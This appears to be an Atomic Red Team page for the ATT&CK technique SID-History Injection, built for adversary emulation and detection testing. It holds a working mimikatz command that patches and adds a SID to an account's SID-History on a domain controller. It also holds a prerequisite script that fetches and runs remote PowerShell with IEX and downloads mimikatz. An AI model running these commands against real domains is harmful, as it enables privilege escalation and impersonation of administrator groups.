Try it using Invoke-Atomic

Access Token Manipulation: SID-History Injection

Description from ATT&CK

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.

Atomic Tests

Atomic Test #1 - Injection SID-History with mimikatz

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller

Supported Platforms: windows

auto_generated_guid: 6bef32e5-9456-4072-8f14-35566fb85401

Inputs:

Name Description Type Default Value
sid_to_inject SID to inject into sidhistory String S-1-5-21-1004336348-1177238915-682003330-1134
sam_account_name Target account to modify String $env:username
mimikatz_path Mimikatz windows executable Path $env:TEMP\mimikatz\x64\mimikatz.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"

Cleanup Commands:

1
2
#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"

Dependencies: Run with powershell!

Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

Check Prereq Commands:

1
2
3
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
4
5
6
7
8
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

source